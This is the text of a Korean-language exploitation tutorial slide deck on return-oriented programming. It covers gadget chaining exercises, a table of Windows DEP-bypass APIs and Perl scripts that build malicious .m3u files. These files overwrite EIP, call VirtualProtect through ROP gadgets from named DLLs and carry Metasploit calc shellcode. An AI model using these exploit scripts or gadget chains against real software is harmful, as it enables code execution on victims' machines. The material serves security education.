system hacking tutorial #4 - buffer overflow - return oriented programming aka. rop

System Hacking & Reverse Engineering

documented by h2spice [email protected]

[ Buffer Overflow - Return Oriented Programming aka. ROP ]

mailto:[email protected]

Who am I

Sanghwan,Ahn (h2spice)

Works for LINE.Corp

Carrying out research on the vulnerability (exploitation,hunt,analysis)

시스템 해킹 / 리버싱

취약점 원리

Buffer Overflow

Format String Bug

Stack Overflow

Use After Free

Heap Overflow

Heap Overflow

익스플로잇(Win32/*NIX/ARM)

Overwriting RET

Egg Hunting

Overwriting SEH

RTL

ROP

Heap Spraying

취약점 / 악성코드 분석

악성코드 분석

버그 헌팅

X86 ARM

취약점 분석

Software on X86

Mobile

소스코드 분석

퍼징

CVE-XXXX-XXXX

Exploit-DBInj3ct0r - 1337day

리버스 엔지니어링

iOS

Android

커리큘럼 소개

Overwriting .dtors

Overwriting GOT

목차커리큘럼 소개

Track3 - Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP

Heap Spray

Track3-2 *NIX

Overwrite RET

RTL

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

RTL

ROP

Track3. Exploitation


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

ROP(Return Oriented Programming)Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


ROP(Return Oriented Programming)

리턴 지향 프로그램이 (ROP)는 공격자가 현재 수행 중인 프로그램 코드 안에 존재하는 서브루틴이 리턴 명령어에 닿기 전에 선별된 기계어 명령어 또는 기계 명령어 덩어리를 간접적으로 실행시키기 위해 콜 스택의 제어를 통제하는 기술

Memory Defense Mechanism 우회 가능 무작위성 주소공간 배치 난수화 (ASLR: Address Space Layout Randomization)

데이터 실행 방지 ( DEP : Data Execution Prevention) or W^X (Write xor eXecute)

Ret-to-LibC 기법에 대한 이해 필요


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


ROP Gadget ChainGadget Chain 구성 기준 전체 함수를 사용하는 대신에 명령어의 연속된 작은 덩어리들을 이용. 명령어 조각은 2개에서 5개 정도의 크기. 모든 명령어 조각은 ret 명령으로 끝나야 함. 명령어 조각들은 ‘gadget’ 으로 서로 연결되어 명령어 덩어리를 형성 gadget은 의도된 특정 행동을 수행 (load, store, xor or branch)

공격자는 여러개의 gadget을 조합해 공격의 정교함을 더할 수 있음


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Principle of ROP

Load 명령을 수행하기 위한 기계어 8개가 있고, 필요한 인자가 하나 있다고 가정한다면, Load 기능을 수행하기 위한 가젯은 왼쪽 Gadget1 과 같이 구성되어야 한다. (물론 각각의 기계어들을 현재 수행되고 있는, 공격자가 접근 가능한 프로그램 내부에 존재하는 기계어 조각들 중에서 추출되어야 한다.)

추출 과정을 통해 구성된 가젯들을 수행하게 되면 별도의 코드 삽입이나, 내장 함수를 이용하지 않아도 공격자가 원하는 행동들을 수행할 수 있다.

ins1ins2ins3ret

ins1ins2ret

ins1ins2popret

ins1ret

Gadget1 (Load)

1 2 3 4

ins1ins2ins3ret

ins1ins2ret

Gadget2 (Add)

5 6


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Principle of ROPins1ins2ins3ret

ins1ins2ret

ins1ins2popret

ins1ret

Gadget1 (Load)

1 2 3 4

ins1ins2ins3ret

ins1ins2ret

Gadget2 (Add)

5 6

return address 6return address 5return address 4

argumentreturn address 3return address 2return address 1

Pattern 2

Pattern 1


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


MOV EAX, 0INC EAXINC EAX

ret

1 2 3

INC EAXINC EAXINC EAX

ret


ret

Gadget A

Practice1. Understanding of gadget (1)


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



ret

1 2 3


ret


ret

Gadget A

What’s the value of EAX ?



Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



ret

1 2 3


ret


ret

Gadget A

EAX is 8



Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



ret

Gadget B

POP EDIPOP EDIPOP EDI

ret


ret

1 2 3


ret


ret


ret

4 5 6



Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



ret

Gadget B


ret


ret

1 2 3


ret


ret


ret

4 5 6What’s the value of EAX ?



Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



ret

Gadget B


ret


ret

1 2 3


ret


ret


ret

4 5 6

EAX is 5



Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


strcpy(dest,src)

Gadget C

POPPOP ret

dest1 2 3

src4

strcpy(dest,src) POPPOP ret

dest5 6 7

src8


dest9 10

src11 12

?

?

?Fill in the blanks

with appropriate gadget.

Practice3. Gadget for calling function


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


strcpy(dest,src)

Gadget C

POPPOP ret

dest1 2 3

src4


dest5 6 7

src8


dest src9 10 11 12

Practice3. Gadget for calling function


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


make EAX to 0x41414141 ,EBP to DEADBEEF

Practice4. Gadget for modification registry


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


my $file= "rop1.m3u"; my $buffersize = 26022; my $junk = "A" x $buffersize; my $eip=pack('V',0x100102DC); #pointer to RET my $junk2 = "AAAA"; #compensate, to make sure ESP points at first rop gadget my $rop = pack('V',0x10026D56); #POP EAX + RET (gadget 1) $rop = $rop . pack('V',0x414140C1); #this will be popped into EAX $rop = $rop . pack('V',0x1002DC24); #ADD EAX,80 + POP EBX + RET (gadget 2) $rop = $rop . pack('V',0xDEADBEEF); #this will be popped into EBX my $rest = "C" x 1000; my $payload = $junk.$eip.$junk2.$rop.$rest; print "Payload size : ".length($payload)."n"; open($FILE,">$file"); print $FILE $payload; close($FILE); print "m3u File $file Created successfullyn";

Practice4. Gadget for modification registry

Bypassing DEP by using ROP

API/OS XP SP2 XP SP3 Vista SP0 Vista SP1 Windows7 Windows 2003 SP1

Windows 2008

VirtualAlloc Yes Yes Yes Yes Yes Yes Yes

HeapCreate Yes Yes Yes Yes Yes Yes Yes

SetProcessDEPPolicy No(1) Yes No(1) Yes No(2) No(1) Yes

NtSetInformationProcess Yes Yes Yes No(2) No(2) Yes No(2)

VirtualProtect Yes Yes Yes Yes Yes Yes Yes

WriteProcessMemory Yes Yes Yes Yes Yes Yes Yes

(1) = doesn’t exist (2) = will fail because of default DEP Policy settings


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Select Weapon for bypassing DEP

Select Weapon for bypassing DEP


API/OS XP SP2 XP SP3 Vista SP0 Vista SP1 Windows7 Windows 2003 SP1

Windows 2008

VirtualAlloc Yes Yes Yes Yes Yes Yes Yes

HeapCreate Yes Yes Yes Yes Yes Yes Yes

SetProcessDEPPolicy No(1) Yes No(1) Yes No(2) No(1) Yes

NtSetInformationProcess Yes Yes Yes No(2) No(2) Yes No(2)

VirtualProtect Yes Yes Yes Yes Yes Yes Yes

WriteProcessMemory Yes Yes Yes Yes Yes Yes Yes

(1) = doesn’t exist (2) = will fail because of default DEP Policy settings


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


VirtualProtect function infolpAddress : 권한을 변경하고자하는 메모리 영역의 주소 dwSize : 변경할 메모리 크기flNewProtect : 변경할 플래그 (RWX등)lpflOldProtect : 현재 플래그를 저장할 주소

Bypassing DEP by using ROPTrack3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


PAGE_EXECUTE 0X10 / PAGE_EXECUTE_READ 0X20 /PAGE_EXECUTE_READWRITE 0X40 / PAGE_EXECUTE_WRITECOPY 0X80 PAGE_NOACCESS 0X01 / PAGE_READONLY 0X02 / PAGE_READWRITE X04 / PAGE_WRITECOPY 0X08


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


by hand

my $file= "rop2.m3u"; my $buffersize = 26022; my $junk = "Z" x $buffersize; my $eip=pack('V',0x7C801AD4); #pointer to VirtualProtect my $params= "VVVV"; $params = $params."WWWW"; $params = $params."XXXX"; $params = $params."YYYY"; $params = $params."ZZZZ";

# windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .

…omit… "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05";

my $nops = "\x90" x 200; my $rest = "C" x 300; my $payload = $junk.$eip.$params.$nops.$shellcode.$rest; print "Payload size : ".length($payload)."n"; print "Shellcode size : ".length($shellcode)."n"; open($FILE,">$file"); print $FILE $payload; close($FILE); print "m3u File $file Created successfullyn";

http://www.metasploit.com


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



RET EBP

Buffer[26020]


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



RET EBP

Buffer[26020]

Z Z Z ZZ Z Z ZZ Z Z ZZ Z Z ZZ Z Z ZZ Z Z ZZ Z Z Z


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



RET VirtualProtect( )Z Z Z ZZ Z Z ZZ Z Z ZZ Z Z ZZ Z Z ZZ Z Z ZZ Z Z Z

RET


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



VirtualProtect( )Z Z Z ZZ Z Z ZZ Z Z ZZ Z Z ZZ Z Z ZZ Z Z ZZ Z Z Z

Padding -> VVVV


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


lpflOldProtectflNewProtect

dwSizelpAddress

return address

RET


Padding


VirtualProtect( )


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


by hand

my $file= "rop2.m3u"; my $buffersize = 26022; my $junk = "Z" x $buffersize; my $eip=pack('V',0x7C801AD4); #pointer to VirtualProtect my $junk2 = "AAAA"; #compensates my $params=pack('V',0x01010101); #return address $params = $params."XXXX"; #lpAddress $params = $params."YYYY"; #Size - Shellcode length $params = $params."ZZZZ"; #flNewProtect $params = $params.pack('V',0x10035005); #writeable address

# windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .

…omit… "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05";

my $nops = "\x90" x 200; my $rest = "C" x 300; my $payload = $junk.$eip.$junk2.$params.$nops.$shellcode.$rest; print "Payload size : ".length($payload)."n"; print "Shellcode size : ".length($shellcode)."n"; open($FILE,">$file"); print $FILE $payload; close($FILE); print "m3u File $file Created successfullyn";

http://www.metasploit.com


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



dwSizelpAddress

return address

RET


Padding


VirtualProtect( )


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



dwSizelpAddress

0x000FF80C

RET


Padding


VirtualProtect( )Shellcode

1번째 인자값을 쉘코드의 주소 변조 (수동으로)


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



dwSize0x000FF80C0x000FF80C

RET


Padding



2번째 인자값을 쉘코드의 주소 변조 (수동으로)


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



0x000002BC(700)0x000FF80C0x000FF80C

RET


Padding



3번째 인자값을 쉘코드의 사이즈+@ 로 변조 (수동으로)


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


lpflOldProtect0x00000040(RWX)0x000002BC(700)

0x000FF80C0x000FF80C

RET


Padding



4번째 인자값을 RWX 권한 플래그로 변조 (수동으로)


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


0x100350050x00000040(RWX)0x000002BC(700)

0x000FF80C0x000FF80C

RET


Padding



5번째 인자값을 현재 플래그를 저장할 주소로 변조 (수동으로)


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Bypassing DEP by using ROPPUSH Parameters


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



Call VirtualProtectEX

Change the protection on a region of committed page and Return to start point of shell code , Execute it


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Question.1First. automatically set these arguments ?


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Question.1First. automatically set these arguments ?

Yes


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Second. and then execute it ?

Question.2


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Second. and then execute it ?

Question.2

Yes


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Third. How ?

Question.3


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Third. How ?

Question.3

by using ROP


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Control Flow of

세번째 인자값 생성세번째 인자 예약 공간에 값을 덮어씀

네번째 인자값 생성네번째 인자 예약 공간에 값을 덮어씀

다섯번째 인자값 생성다섯번째 인자 예약 공간에 값을 덮어씀

ESP 값을 VirtualProtect( ) 시작 위치로 조작 / 리턴

Junk + NOP

Shell Code

ESP 를 레지스터에 저장인자 생성 코드로 점프

VirtualProtect( )를 가리키는 포인터첫번째 인자 예약 공간두번째 인자 예약 공간세번째 인자 예약 공간네번째 인자 예약 공간다섯번째 인자 예약 공간첫번째 인자값 생성

첫번째 인자 예약 공간에 값을 덮어씀두번째 인자값 생성

두번째 인자 예약 공간에 값을 덮어씀

EIP


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Control Flow of





Junk + NOP

Shell Code





EIP Gadget A

Gadget B

Gadget C

Gadget D

Gadget E

Gadget F

Gadget G

Gadget H


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Control Flow of





Junk + NOP

Shell Code


VirtualProtect( )를 가리키는 포인터첫번째 인자 (WWWW) 예약 공간

두번째 인자 예약 공간세번째 인자 예약 공간네번째 인자 예약 공간다섯번째 인자 예약 공간첫번째 인자값 생성



EIP Gadget A

Gadget B

Gadget C

Gadget D

Gadget E

Gadget F

Gadget G

Gadget H

Execution


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -1





Junk + NOP

Shell Code





EIP Gadget A


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -1





Junk + NOP

Shell Code





EIP Gadget A

0x5AD79277:# PUSH ESP # MOV EAX,EDX # POP EDI # RETN [Module: uxtheme.dll]

0x77C1E842:# PUSH EDI # POP EAX # POP EBP # RETN [Module: msvcrt.dll]

0x1001653D:# ADD ESP,20 # RETN [Module: MSRMfilter03.dll]

ESP를 레지스터에 저장하는 GadgetA-1

인자 생성 코드로 점프하는 GadgetA-2


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -1

[ROP-3 코드 참조]


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -2





Junk + NOP

Shell Code





EIP Gadget A

Gadget C


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -2





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

0x1002DC4C:# ADD EAX,100 # POP EBP # RETN [Module: MSRMfilter03.dll]

0x77E84115: # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module: RPCRT4.dll]

0x763C982F:# XCHG ESI,EDI # DEC ECX # RETN 4 [Module: comdlg32.dll]

첫번째 인자(쉘코드의 주소)값을 생성하는 GadgetC-1

첫번째 인자 예약 공간에 값을 덮어 씌우는 GadgetC-2

첫번째 인자 예약 공간의 주소를 생성하는 GadgetC-3


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


[ROP-4 코드 참조]

Step by Step -2


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -3





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

Gadget D


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -3





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

Gadget D

0x775D131E:# PUSH EAX # POP ESI # RETN [Module: ole32.dll]

0x77157D1D:# INC ESI # RETN [Module: OLEAUT32.dll]

ESI를 증가시켜 두번째 인자 예약 공간을 가리키도록 하는 GadgetD-2x4 반복(4bytes)

ESI 레지스터 값을 다시 되돌려놓는 GadgetD-1


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


[ROP-5코드 참조]

Step by Step -3


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -4





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

Gadget D

Gadget E


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -4





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

Gadget D

Gadget E


0x100307A9:# XOR EAX,EAX # RETN [Module: MSRMfilt.dll]

0x1002DC4C:# ADD EAX,100 # POP EBP # RETN [Module: MSRMfilt.dll]

ESI 레지스터 값을 다시 되돌려놓는 GadgetE-1

세번째 인자값 300을 생성하는 GadgetE-2

X 3 반복


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -5





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

Gadget D

Gadget E

Gadget F


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -5





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

Gadget D

Gadget E


0x100307A9:# XOR EAX,EAX # RETN [Module: MSRMfilt.dll]

0x1002DC4C:# ADD EAX,40 # POP EBP # RETN [Module: MSRMfilt.dll]

Gadget F

ESI 레지스터 값을 다시 되돌려놓는 GadgetF-1

세번째 인자값 300을 생성하는 GadgetF-2


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -6





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

Gadget D

Gadget E

Gadget F

Gadget G


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -6





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

Gadget D

Gadget E

Gadget F

Gadget G

5번째 인자값은 별도의 Gadget 없이 초기 설정 가능


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -7





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

Gadget D

Gadget E

Gadget F

Gadget G

Gadget H


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -7





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

Gadget D

Gadget E

Gadget F

Gadget G

Gadget H

0x73DF5CA8:# PUSH EAX # POP ESP # MOV EAX,EDI # POP EDI # POP ESI # RETN [Module: MFC42.dll]

0x775D12F1:# SUB EAX,4 # RETN [Module: ole32.dll]

